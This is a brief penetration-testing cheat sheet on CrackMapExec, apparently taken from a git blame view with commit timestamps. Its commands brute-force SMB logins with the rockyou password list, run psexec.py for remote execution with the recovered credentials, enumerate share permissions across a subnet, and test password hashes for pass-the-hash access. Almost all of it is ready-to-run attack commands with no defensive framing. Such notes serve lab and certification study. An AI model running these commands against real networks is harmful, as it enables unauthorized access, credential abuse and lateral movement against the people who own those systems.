2021-11-04 17:19:58 +01:00
|
|
|
# Crackmapexec
|
|
|
|
|
|
|
|
* Dictionary attack against SMB
|
|
|
|
```sh
|
|
|
|
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
|
|
|
|
```
|
2021-11-04 17:35:57 +01:00
|
|
|
* Use the password with `impacket/examples/psexec.py` in the following way
|
|
|
|
```sh
|
|
|
|
psexec.py domain.name/<user>:<password>@<target-IP>
|
|
|
|
```
|
2021-12-04 00:26:03 +01:00
|
|
|
|
2022-04-14 01:06:16 +02:00
|
|
|
## Shares
|
|
|
|
|
|
|
|
* Check user permissions on shares
|
|
|
|
``sh
|
|
|
|
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
|
|
|
|
```
|
|
|
|
|
2021-12-04 00:26:03 +01:00
|
|
|
## SMB
|
|
|
|
* Check user hash on the network via smb
|
|
|
|
```sh
|
|
|
|
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
|
|
|
|
```
|
2022-04-14 01:06:16 +02:00
|
|
|
|
|
|
|
|